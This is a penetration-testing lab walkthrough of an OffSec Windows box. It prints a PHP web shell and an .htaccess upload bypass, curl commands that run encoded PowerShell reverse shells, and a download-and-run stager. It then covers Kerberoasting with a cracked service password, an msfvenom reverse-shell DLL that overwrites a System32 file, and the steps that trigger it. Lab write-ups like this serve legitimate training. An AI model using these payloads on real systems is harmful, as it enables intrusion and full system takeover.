System Information
OS: Windows Architecture: x86
Service Discovery
Helper scripts source: https://github.com/CameronCandau/Pentest-Automation
new-target access 192.168.228.187
cd ~/oscp/access
scan.sh --autorecon
80/tcp HTTP
feroxbuster points out /Ticket.php:
We see that the “Buy Tickets” form submits to /Ticket.php.
File upload catches my attention. Feroxbuster also pointed out /uploads/. After uploading an image, we find that we can access it directly. This could lead to LFI if the server is misconfigured and allows us to upload/execute PHP code.
Can I upload a shell.php?
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
Nope.
Initial Access
We can however, upload a .htaccess:
AddType application/x-httpd-php .rce
Reference used in OffSec’s writeup for this box — looks like a great runbook for file upload overall: https://onsecurity.io/article/file-upload-checklist/#uploading-a-htaccess-file
We can upload shell.rce and then run it:
Same with curl:
curl -G http://192.168.228.187/uploads/shell.rce --data-urlencode "cmd=whoami"
Use it to get a reverse shell (payload generated with Penelope):
curl -G http://192.168.228.187/uploads/shell.rce --data-urlencode "cmd=cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA4ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
Restarted lab (target IP changed to 192.168.125.187)
Privilege Escalation
Domain: access.offsec
Get-ADDomainController
Kerberoasting svc_mssql
No accounts vulnerable to asreproast.
1 Kerberoastable user, svc_mssql
Cracked using rockyou.txt:
…
Validate with NetExec:
Add to credentials: svc_mssql:trustno1
Interesting because we didn’t see any MSSQL server running on this host. Also not from the host itself:
(nothing listening on 1433/TCP)
No password reuse, only valid for svc_mssql:
RunasCs.exe as svc_mssql
RunasCs.exe to login locally, since we can’t remote in as svc_mssql.
Confirm usage and that we’re able to run commands a svc_mssql:
RunasCs.exe svc_mssql trustno1 "powershell whoami"
Establish reverse shell:
.\RunasCs.exe svc_mssql trustno1 "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEANwAzACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
This base64 encoded payload didn’t work for me while using RunasCs.exe, so I switched to a staged payload instead, which succeeded.
stage.ps1
IEX(IWR http://192.168.45.173:8001/scripts/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 192.168.45.173 443
SeManageVolume for System
According to https://github.com/gtworek/Priv2Admin, SeMagageVolume can get us admin.
From Google I found https://github.com/CsEnox/SeManageVolumeExploit which should allow us to abuse the privilege to elevate to Administrator.
After downloading the compiled binary from this repo, transferring it to the target, and running as svc_mssql, it seems that we’re now able to write to System32.
icacls output for C:\Windows\System32 confirms that BUILTIN\Users has (F)ull access.
Continuing to follow this repo’s directions, I’ll replace C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll with a malicious DLL.
Another example of DLL hijacking/overwriting that we could have used at this point is https://github.com/sailay1996/WerTrigger
Generate the DLL:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.173 LPORT=4444 -f dll > Printconfig.dll
Transfer to host, make a copy of Printconfig.dll in case we need to restore, and then replace the original with ours. Then, use the PowerShell from the repo to initiate PrintNotify, which will run Printconfig.dll as system, giving a reverse shell.
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
Proof Screenshots (local.txt / proof.txt)
type or cat flag and include IP address in screenshot
